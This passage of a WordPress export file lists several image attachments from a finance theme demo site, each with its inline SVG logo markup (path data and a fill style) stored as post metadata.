		<path class="st0" d="M49.8,23.5c-0.9-0.3-1.6-0.6-2.1-1l0.9-2.1c0.5,0.4,1.1,0.7,1.8,0.9c0.7,0.2,1.4,0.3,2.1,0.3    c0.8,0,1.4-0.1,1.7-0.4c0.4-0.2,0.6-0.5,0.6-0.9c0-0.3-0.1-0.5-0.3-0.7c-0.2-0.2-0.5-0.3-0.9-0.5c-0.3-0.1-0.8-0.2-1.4-0.4    c-0.9-0.2-1.7-0.4-2.2-0.6c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.5-0.6-1.1-0.6-1.9c0-0.7,0.2-1.3,0.6-1.9c0.4-0.6,0.9-1,1.7-1.3    c0.8-0.3,1.7-0.5,2.8-0.5c0.8,0,1.5,0.1,2.2,0.3c0.7,0.2,1.4,0.4,1.9,0.8l-0.9,2.1c-1.1-0.6-2.2-0.9-3.3-0.9    c-0.8,0-1.3,0.1-1.7,0.4c-0.4,0.3-0.6,0.6-0.6,1s0.2,0.7,0.6,0.9c0.4,0.2,1.1,0.4,2,0.6c0.9,0.2,1.7,0.4,2.2,0.6    c0.6,0.2,1.1,0.6,1.5,1c0.4,0.5,0.6,1.1,0.6,1.9c0,0.7-0.2,1.3-0.6,1.9c-0.4,0.6-1,1-1.7,1.3c-0.8,0.3-1.7,0.5-2.8,0.5    C51.6,23.8,50.7,23.7,49.8,23.5z"></path>
		<path class="st0" d="M68.8,21.4v2.2h-9.3v-12h9v2.2h-6.3v2.6h5.6v2.2h-5.6v2.8H68.8z"></path>
		<path class="st0" d="M73.4,23c-1-0.5-1.8-1.3-2.3-2.2c-0.6-0.9-0.8-2-0.8-3.2c0-1.2,0.3-2.2,0.8-3.2c0.6-0.9,1.3-1.7,2.3-2.2    c1-0.5,2.1-0.8,3.4-0.8c1.2,0,2.4,0.3,3.3,0.8c1,0.5,1.8,1.3,2.3,2.2c0.6,0.9,0.9,2,0.9,3.2c0,1.2-0.3,2.2-0.9,3.2    c-0.6,0.9-1.4,1.7-2.3,2.2c-1,0.5-2.1,0.8-3.3,0.8C75.5,23.8,74.4,23.6,73.4,23z M78.7,21c0.6-0.3,1-0.8,1.3-1.4    c0.3-0.6,0.5-1.2,0.5-2c0-0.7-0.2-1.4-0.5-2c-0.3-0.6-0.8-1-1.3-1.4c-0.6-0.3-1.2-0.5-1.9-0.5c-0.7,0-1.3,0.2-1.9,0.5    c-0.6,0.3-1,0.8-1.3,1.4c-0.3,0.6-0.5,1.2-0.5,2c0,0.7,0.2,1.4,0.5,2c0.3,0.6,0.8,1,1.3,1.4c0.6,0.3,1.2,0.5,1.9,0.5    C77.5,21.5,78.1,21.3,78.7,21z"></path>
		<path class="st0" d="M101.1,23.6l0-7.2l-3.5,5.9h-1.2l-3.5-5.8v7h-2.6v-12h2.3l4.5,7.4l4.4-7.4h2.3l0,12H101.1z"></path>
		<path class="st0" d="M106.5,12.7c-0.3-0.3-0.5-0.6-0.5-1.1c0-0.4,0.2-0.8,0.5-1.1c0.3-0.3,0.7-0.4,1.2-0.4c0.5,0,0.9,0.1,1.2,0.4    s0.5,0.6,0.5,1c0,0.4-0.2,0.8-0.5,1.1c-0.3,0.3-0.7,0.4-1.2,0.4C107.2,13.2,106.8,13,106.5,12.7z M106.3,14.4h2.7v9.2h-2.7V14.4z"></path>
		<path class="st0" d="M119.8,15.3c0.7,0.7,1.1,1.7,1.1,3v5.3h-2.7v-4.9c0-0.7-0.2-1.3-0.5-1.6c-0.3-0.4-0.8-0.5-1.4-0.5    c-0.7,0-1.2,0.2-1.6,0.6c-0.4,0.4-0.6,1-0.6,1.9v4.5h-2.7v-9.2h2.5v1.1c0.4-0.4,0.8-0.7,1.3-0.9c0.5-0.2,1.1-0.3,1.7-0.3    C118.2,14.3,119.1,14.7,119.8,15.3z"></path>
		<path class="st0" d="M132.8,11v12.7h-2.5v-1.1c-0.7,0.8-1.6,1.2-2.9,1.2c-0.9,0-1.6-0.2-2.4-0.6c-0.7-0.4-1.3-0.9-1.6-1.7    c-0.4-0.7-0.6-1.5-0.6-2.5c0-0.9,0.2-1.8,0.6-2.5c0.4-0.7,0.9-1.3,1.6-1.7c0.7-0.4,1.5-0.6,2.4-0.6c1.2,0,2.1,0.4,2.8,1.1V11    H132.8z M129.5,20.9c0.4-0.5,0.7-1.1,0.7-1.9c0-0.8-0.2-1.4-0.7-1.9c-0.4-0.5-1-0.7-1.7-0.7c-0.7,0-1.2,0.2-1.7,0.7    c-0.4,0.5-0.7,1.1-0.7,1.9c0,0.8,0.2,1.4,0.7,1.9c0.4,0.5,1,0.7,1.7,0.7C128.5,21.6,129,21.4,129.5,20.9z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>02</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/faqs/02-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/02-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>584</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[02-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/02-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/02-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 131.6 29.8" style="enable-background:new 0 0 131.6 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x32_">
	<g>
		<path class="st0" d="M43.3,8.1h2.8v12.5h-2.8V8.1z"></path>
		<path class="st0" d="M53.1,20.7c-0.7,0-1.4,0-2-0.1s-1.4-0.1-2.1-0.3V8.3c0.6-0.1,1.2-0.2,1.9-0.2c0.7-0.1,1.3-0.1,1.9-0.1    c0.8,0,1.5,0.1,2.2,0.2c0.7,0.1,1.2,0.3,1.7,0.6c0.5,0.3,0.9,0.6,1.1,1.1c0.3,0.5,0.4,1,0.4,1.7c0,1-0.5,1.8-1.4,2.4    c0.8,0.3,1.3,0.7,1.6,1.2c0.3,0.5,0.4,1.1,0.4,1.7c0,1.3-0.5,2.3-1.4,3C56.4,20.4,55,20.7,53.1,20.7z M51.7,13h1.4    c0.9,0,1.5-0.1,1.9-0.3c0.4-0.2,0.6-0.6,0.6-1.1c0-0.5-0.2-0.9-0.6-1.1s-0.9-0.3-1.7-0.3c-0.2,0-0.5,0-0.8,0c-0.3,0-0.5,0-0.7,0    V13z M51.7,15.1v3.2c0.2,0,0.4,0,0.7,0.1c0.2,0,0.5,0,0.8,0c0.8,0,1.5-0.1,2-0.4s0.8-0.7,0.8-1.3c0-0.6-0.2-1-0.6-1.2    c-0.4-0.2-1-0.4-1.9-0.4H51.7z"></path>
		<path class="st0" d="M64.4,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2H72c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H64.4z"></path>
		<path class="st0" d="M84.8,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2h-2.7c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H84.8z"></path>
		<path class="st0" d="M97,15.9c0-0.8,0.1-1.6,0.4-2.2c0.3-0.6,0.6-1.2,1-1.6c0.4-0.4,0.9-0.7,1.4-1c0.5-0.2,1.1-0.3,1.7-0.3    c1.3,0,2.4,0.4,3.2,1.2c0.8,0.8,1.2,2,1.2,3.6c0,0.2,0,0.3,0,0.5c0,0.2,0,0.4,0,0.5h-6.1c0.1,0.6,0.3,1,0.8,1.3s1.1,0.5,1.8,0.5    c0.5,0,1,0,1.4-0.1c0.5-0.1,0.9-0.2,1.2-0.3l0.4,2.2c-0.1,0.1-0.3,0.1-0.6,0.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-0.9,0.1    s-0.7,0.1-1,0.1c-0.9,0-1.6-0.1-2.2-0.4s-1.2-0.6-1.6-1c-0.4-0.4-0.7-1-0.9-1.6C97.1,17.2,97,16.6,97,15.9z M103.3,14.9    c0-0.2-0.1-0.4-0.1-0.7c-0.1-0.2-0.2-0.4-0.3-0.6c-0.1-0.2-0.3-0.3-0.5-0.4c-0.2-0.1-0.5-0.2-0.8-0.2c-0.3,0-0.6,0.1-0.8,0.2    c-0.2,0.1-0.4,0.2-0.5,0.4c-0.1,0.2-0.3,0.4-0.3,0.6c-0.1,0.2-0.1,0.4-0.2,0.7H103.3z"></path>
		<path class="st0" d="M116.4,20.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-1,0.2c-0.3,0-0.7,0.1-1,0.1c-0.4,0-0.7,0-1,0    c-0.8,0-1.5-0.1-2.1-0.3c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.4-0.7-0.9-1-1.5c-0.2-0.6-0.3-1.3-0.3-2c0-0.8,0.1-1.5,0.3-2.1    c0.2-0.6,0.5-1.1,0.8-1.6c0.4-0.4,0.8-0.8,1.3-1c0.5-0.2,1.1-0.3,1.8-0.3c0.4,0,0.7,0,1,0.1c0.3,0.1,0.6,0.2,0.9,0.3V7l2.7-0.4    V20.2z M110.3,15.7c0,0.8,0.2,1.5,0.6,2s0.9,0.8,1.7,0.8c0.2,0,0.5,0,0.7,0c0.2,0,0.4,0,0.5-0.1v-4.9c-0.2-0.1-0.4-0.2-0.7-0.3    c-0.3-0.1-0.5-0.1-0.8-0.1C110.9,13.2,110.3,14,110.3,15.7z"></path>
		<path class="st0" d="M121.8,8.3c0,0.5-0.2,0.9-0.5,1.2s-0.7,0.4-1.1,0.4c-0.4,0-0.8-0.1-1.1-0.4s-0.5-0.7-0.5-1.2s0.2-0.9,0.5-1.2    c0.3-0.3,0.7-0.4,1.1-0.4c0.4,0,0.8,0.1,1.1,0.4C121.6,7.5,121.8,7.9,121.8,8.3z M121.6,20.6h-2.7v-9.5h2.7V20.6z"></path>
		<path class="st0" d="M127.5,10.8c0.8,0,1.5,0.1,2,0.3c0.5,0.2,1,0.4,1.3,0.8c0.3,0.3,0.5,0.7,0.7,1.2c0.1,0.5,0.2,1,0.2,1.6v5.6    c-0.4,0.1-0.9,0.2-1.6,0.3c-0.7,0.1-1.5,0.2-2.5,0.2c-0.6,0-1.2-0.1-1.7-0.2c-0.5-0.1-0.9-0.3-1.3-0.5s-0.6-0.6-0.8-1    c-0.2-0.4-0.3-0.9-0.3-1.5c0-0.6,0.1-1,0.3-1.4c0.2-0.4,0.5-0.7,0.9-0.9c0.4-0.2,0.8-0.4,1.3-0.5c0.5-0.1,1-0.2,1.5-0.2    c0.3,0,0.7,0,0.9,0c0.3,0,0.5,0.1,0.7,0.1v-0.3c0-0.5-0.1-0.8-0.4-1.1c-0.3-0.3-0.8-0.4-1.4-0.4c-0.5,0-0.9,0-1.4,0.1    c-0.4,0.1-0.8,0.2-1.2,0.3l-0.3-2.2c0.2,0,0.4-0.1,0.6-0.2c0.2-0.1,0.5-0.1,0.8-0.1c0.3,0,0.6-0.1,0.9-0.1    C126.9,10.8,127.2,10.8,127.5,10.8z M127.7,18.7c0.3,0,0.5,0,0.8,0s0.4,0,0.6-0.1v-2c-0.1,0-0.3,0-0.5-0.1c-0.2,0-0.4,0-0.6,0    c-0.3,0-0.5,0-0.7,0s-0.4,0.1-0.6,0.2s-0.3,0.2-0.4,0.3c-0.1,0.1-0.1,0.3-0.1,0.5c0,0.4,0.1,0.7,0.4,0.9S127.2,18.7,127.7,18.7z"></path>
	</g>
	<g>
		<g>
			<path class="st0" d="M5.5,6.5V0H4.8C2.2,0,0,2.2,0,4.8v1.7H5.5z"></path>
		</g>
		<g>
			<path class="st0" d="M25.1,8.4h4.8V4.8c0-2.6-2.1-4.8-4.8-4.8V8.4z"></path>
		</g>
		<g>
			<path class="st0" d="M21.6,25.1v4.7H25c2.6,0,4.8-2.1,4.8-4.7H21.6z"></path>
		</g>
		<g>
			<path class="st0" d="M6.7,23.8H0v-1.5h7.4c0.4,0,0.8,0.3,0.8,0.8v6.8h2.2v-9.4H6c-0.4,0-0.8-0.3-0.8-0.8V14     c-0.5-0.3-0.9-0.9-0.9-1.5c0-0.9,0.8-1.7,1.7-1.7c0.9,0,1.7,0.8,1.7,1.7c0,0.7-0.4,1.3-1,1.6V19h4.4c0.4,0,0.8,0.3,0.8,0.8v10.1     h3.4v-3.4c-0.6-0.3-1-0.9-1-1.6c0-0.9,0.8-1.7,1.7-1.7s1.7,0.8,1.7,1.7c0,0.7-0.4,1.2-0.9,1.5v3.4H20v-5.5c0-0.4,0.3-0.8,0.8-0.8     h9v-9.5h-3v4.7c0,0.4-0.3,0.8-0.8,0.8h-5.5c-0.3,0.6-0.9,1-1.6,1c-0.9,0-1.7-0.8-1.7-1.7c0-0.9,0.8-1.7,1.7-1.7     c0.7,0,1.2,0.4,1.5,0.9h4.8v-4.7c0-0.4,0.3-0.8,0.8-0.8h3.7V9.9h-5.5c-0.4,0-0.8-0.3-0.8-0.8V0h-8.2v2.7h5.1     c0.4,0,0.8,0.3,0.8,0.8v5.6c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7c-0.9,0-1.7-0.8-1.7-1.7c0-0.7,0.4-1.2,0.9-1.5V4.2h-5.1     c-0.4,0-0.8-0.3-0.8-0.8V0h-3.7v5.6h3.1c0.4,0,0.8,0.3,0.8,0.8v7c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7     c-0.9,0-1.7-0.8-1.7-1.7c0-0.6,0.4-1.2,0.9-1.5V7.1H9.4C9,7.1,8.6,6.7,8.6,6.3V0H7v7.2C7,7.7,6.7,8,6.3,8H0v17     c0,2.7,2.2,4.8,4.8,4.8h1.9V23.8z"></path>
		</g>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>03</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/faqs/03-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/03-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>585</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[03-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/03-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/03-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 141.3 30" style="enable-background:new 0 0 141.3 30;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x33_">
	<g>
		<path class="st0" d="M63.8,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5c-0.4,0.4-0.9,0.8-1.5,1c-0.6,0.2-1.2,0.4-1.9,0.4    c-0.7,0-1.4-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1.1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,1.9-0.4c0.8,0,1.5,0.2,2.2,0.5c0.7,0.3,1.3,0.8,1.7,1.3l-1.6,1.4    c-0.3-0.4-0.7-0.7-1-0.9s-0.8-0.3-1.3-0.3c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6s-0.4,0.5-0.5,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.8,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9s0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1.1,0.2    c0.5,0,1-0.1,1.4-0.4c0.4-0.3,0.7-0.6,0.8-1.1h-2.5v-2h5V17.8z"></path>
		<path class="st0" d="M65,22.5v-9.3h4.8c0.5,0,0.9,0.1,1.3,0.2c0.4,0.1,0.7,0.4,1,0.6c0.3,0.3,0.5,0.6,0.7,0.9    c0.2,0.4,0.2,0.8,0.2,1.2c0,0.6-0.2,1.1-0.5,1.6c-0.3,0.5-0.7,0.8-1.3,1.1l2,3.7h-2.6L69,19.1h-1.7v3.4H65z M69.6,15.1h-2.3v2.1    h2.3c0.4,0,0.6-0.1,0.9-0.3c0.2-0.2,0.3-0.4,0.3-0.8c0-0.3-0.1-0.6-0.3-0.8C70.2,15.2,69.9,15.1,69.6,15.1z"></path>
		<path class="st0" d="M74.2,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H74.2z"></path>
		<path class="st0" d="M83,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H83z"></path>
		<path class="st0" d="M91.7,13.2h2.2l4.2,5.4v-5.4h2.2v9.3h-2l-4.4-5.6v5.6h-2.2V13.2z"></path>
		<path class="st0" d="M104.4,22.5v-9.3h2.3v3.6h3.8v-3.6h2.3v9.3h-2.3v-3.6h-3.8v3.6H104.4z"></path>
		<path class="st0" d="M123.9,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.3,0.6-0.6,1.1-1.1,1.5c-0.4,0.4-1,0.8-1.6,1c-0.6,0.2-1.3,0.4-2,0.4    c-0.7,0-1.3-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,2-0.4c0.7,0,1.3,0.1,2,0.4c0.6,0.2,1.1,0.6,1.6,1    c0.4,0.4,0.8,0.9,1.1,1.5C123.8,16.5,123.9,17.2,123.9,17.8z M121.6,17.8c0-0.4-0.1-0.7-0.2-1.1c-0.1-0.3-0.3-0.6-0.6-0.9    s-0.5-0.4-0.8-0.6c-0.3-0.1-0.7-0.2-1-0.2c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6c-0.2,0.2-0.4,0.5-0.6,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.7,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9c0.2,0.2,0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1,0.2    c0.4,0,0.7-0.1,1-0.2c0.3-0.1,0.6-0.3,0.8-0.6c0.2-0.2,0.4-0.5,0.6-0.9C121.5,18.6,121.6,18.2,121.6,17.8z"></path>
		<path class="st0" d="M124.4,21.1l1.3-1.7c0.6,0.5,1.1,0.8,1.6,1c0.5,0.2,1,0.3,1.5,0.3c0.5,0,0.9-0.1,1.2-0.2    c0.3-0.2,0.4-0.4,0.4-0.7c0-0.3-0.1-0.5-0.3-0.6c-0.2-0.1-0.5-0.3-1-0.3l-2-0.4c-0.8-0.1-1.3-0.4-1.7-0.9c-0.4-0.4-0.6-1-0.6-1.7    c0-0.9,0.3-1.6,1-2.1c0.7-0.5,1.6-0.8,2.8-0.8c0.7,0,1.4,0.1,2.1,0.4c0.7,0.2,1.3,0.6,1.8,1l-1.2,1.7c-0.5-0.4-1-0.7-1.4-0.8    c-0.5-0.2-0.9-0.3-1.4-0.3c-0.5,0-0.8,0.1-1.1,0.2c-0.3,0.1-0.4,0.3-0.4,0.6c0,0.2,0.1,0.4,0.3,0.5c0.2,0.1,0.5,0.2,0.8,0.3    l1.9,0.3c0.9,0.1,1.6,0.4,2,0.9c0.5,0.5,0.7,1,0.7,1.8c0,0.9-0.4,1.7-1.1,2.2c-0.7,0.5-1.7,0.8-3,0.8c-0.7,0-1.5-0.1-2.2-0.4    C125.6,21.9,125,21.6,124.4,21.1z"></path>
		<path class="st0" d="M132.9,15.2v-2h8.4v2h-3v7.3H136v-7.3H132.9z"></path>
	</g>
	<path class="st0" d="M25.3,19.9c2.1,0,3.9-1.7,3.9-3.9s-1.7-3.9-3.9-3.9s-3.9,1.7-3.9,3.9S23.2,19.9,25.3,19.9z M13.9,23.1   c-1.4,0-2.5,1.1-2.5,2.5c0,1.4,1.1,2.5,2.5,2.5c1.4,0,2.5-1.1,2.5-2.5C16.5,24.2,15.3,23.1,13.9,23.1z M33.5,25.3   c-1,0-1.8,0.8-1.8,1.8s0.8,1.8,1.8,1.8c1,0,1.8-0.8,1.8-1.8S34.5,25.3,33.5,25.3z M43.8,16.3c-0.2-2.9-2.6-5.3-5.5-5.5   c-2.7-0.2-5,1.4-6,3.6l0,0c0,0,0,0,0,0l-1.7,4.1c-0.8,2-2.5,3.5-4.5,4.2h0c-1.4,0.5-3,0.1-4.1-0.9c-0.4-0.4-0.8-0.8-0.8-0.8   c-0.9-0.8-1.5-1.9-1.7-3.1c-0.1-0.4-0.1-0.8-0.1-1.2l0.2-4.5l0.1-2.1l0,0c0-0.1,0-0.1,0-0.2c0-5.7-4.8-10.2-10.5-9.8   C4.3,0.4,0.4,4.3,0,9.1C0,10,0,10.8,0.2,11.6c0.8,4.6,4.8,8,9.7,8c0.2,0,4.3,0.3,5.9,1.2l1.1,0.6c1.1,0.6,1.9,1.6,2.4,2.7l1.4,3.4   l0,0c0.4,1.4,1.6,2.5,3.2,2.5c1,0,2-0.5,2.6-1.2c0.5-0.6,4.1-4.2,4.1-4.2c0.8-0.9,2-1.4,3.2-1.5l4.8-0.3c2.5-0.2,4.5-1.9,5.3-4.2   c0.2-0.6,0.3-1.2,0.3-1.8C43.8,16.6,43.8,16.4,43.8,16.3z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/faqs/04-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>586</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/04-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 88.4 30.4" style="enable-background:new 0 0 88.4 30.4;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x34_">
	<path class="st0" d="M21.9,6c1.2,1,2.8,1.5,4.6,1.4c0.6,0,1.2-0.1,1.9-0.2c-1.2-1.9-2.8-3.6-4.8-4.9c-1.9-1.2-3.9-1.9-5.9-2.2   l1.8,2.8C20.1,4,20.9,5.2,21.9,6z M5.5,18.4C6.2,17.2,6.9,16,7,14.7c0.1-1-0.3-2.1-0.7-3.2L6,10.4C5.4,8.9,4.7,7.4,4.1,6   C4,5.8,3.9,5.7,3.9,5.6c0-0.1-0.1-0.1-0.1-0.2c0-0.1-0.1-0.2-0.1-0.2C3.2,5.7,2.8,6.2,2.4,6.8c-3.7,5.8-3,13,1.1,18   c-0.1-1.3,0.1-2.6,0.6-3.8C4.5,20.1,5,19.3,5.5,18.4z M30.1,18.9c0,0-0.1,0-0.1,0c-0.2,0-0.4,0-0.6,0c-0.1,0-0.2,0-0.2,0   c-1.4,0.2-2.6,0.5-3.7,1.1c-1.4,0.9-2.2,2.5-2.1,4.1c0,0.5,0.1,0.9,0.2,1.4c0.1,0.7,0.3,1.4,0.3,2.1c1.7-1.1,3.1-2.6,4.3-4.4   C29,21.9,29.7,20.4,30.1,18.9z M29.3,16.6c0.4-0.1,0.8-0.2,1.2-0.2c0.1-1.5,0-3-0.3-4.5c-0.2,0-0.4,0.1-0.5,0.1   